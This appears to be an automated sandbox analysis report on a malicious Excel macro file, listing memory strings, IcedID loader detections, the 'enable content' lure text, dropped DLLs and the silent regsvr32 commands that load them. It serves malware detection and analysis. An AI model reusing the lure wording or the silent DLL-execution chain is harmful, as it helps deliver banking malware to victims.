          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
          Source: regsvr32.exe, 00000003.00000002.2118280737.00000000034EF000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d0.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
          Source: regsvr32.exe, 00000003.00000002.2118280737.00000000034EF000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
          Source: regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gsta
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
          Source: regsvr32.exe, 00000003.00000002.2118303921.00000000034F7000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
          Source: regsvr32.exe, 00000003.00000002.2118280737.00000000034EF000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-12F7F67R64DWA9SFNPP2CX-Content-Ty
          Source: regsvr32.exe, 00000003.00000003.2109396502.00000000034DD000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MJZV6CW8DAJ648ADHVQ4X-Content-Ty
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://prod.log.shortbread.aws.dev
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://prod.tools.shortbread.aws.dev
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
          Source: regsvr32.exe, 00000003.00000003.2109440628.00000000001F6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
          Source: regsvr32.exe, 00000003.00000003.2109365690.0000000003532000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
          Source: regsvr32.exe, 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2123662404.0000000002AF3000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.2131410443.0000000003007000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
          Source: regsvr32.exe, 00000004.00000002.2123619005.0000000002AD6000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443

          E-Banking Fraud:

          barindex
          Yara detected IcedIDShow sources
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000003.00000002.2112709350.00000000001CE000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2129743250.000000000037D000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2122456225.0000000000303000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2112727320.00000000001F7000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2408, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2296, type: MEMORY

          System Summary:

          barindex
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 0Screenshot OCR: Enable Content button from the yellow bar above
          Source: Document image extraction number: 1Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
          Source: Document image extraction number: 1Screenshot OCR: Enable Content button from the yellow bar above
          Office process drops PE fileShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XTOWN.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XRAY.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\XZIBIT.dllJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C1678 NtQuerySystemInformation,RtlAllocateHeap,3_2_002C1678
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00201678 NtQuerySystemInformation,4_2_00201678
          Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_020F1678 NtQuerySystemInformation,RtlAllocateHeap,5_2_020F1678
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_002C18103_2_002C1810
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB15D03_2_000007FEF8FB15D0
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF8FB41BF3_2_000007FEF8FB41BF
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002018104_2_00201810
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F915D04_2_000007FEF8F915D0
          Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000007FEF8F941BF4_2_000007FEF8F941BF
          Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_020F18105_2_020F1810
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
          Source: 3.2.regsvr32.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 5.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 5.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 3.2.regsvr32.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 5.2.regsvr32.exe.20f0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 3.2.regsvr32.exe.2c0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.1a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 4.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000005.00000002.2129614420.0000000000190000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000004.00000002.2122390386.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: 00000003.00000002.2112661766.0000000000130000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
          Source: regsvr32.exe, 00000003.00000002.2117776338.00000000030F0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@7/8@15/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Outfordelivery799862.xlsmJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF2B7.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dllJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Outfordelivery799862.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
          Source: Outfordelivery799862.xlsmInitial sample: OLE zip file path = xl/media/image1.png
          Source: Outfordelivery799862.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
          Source: Outfordelivery799862.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
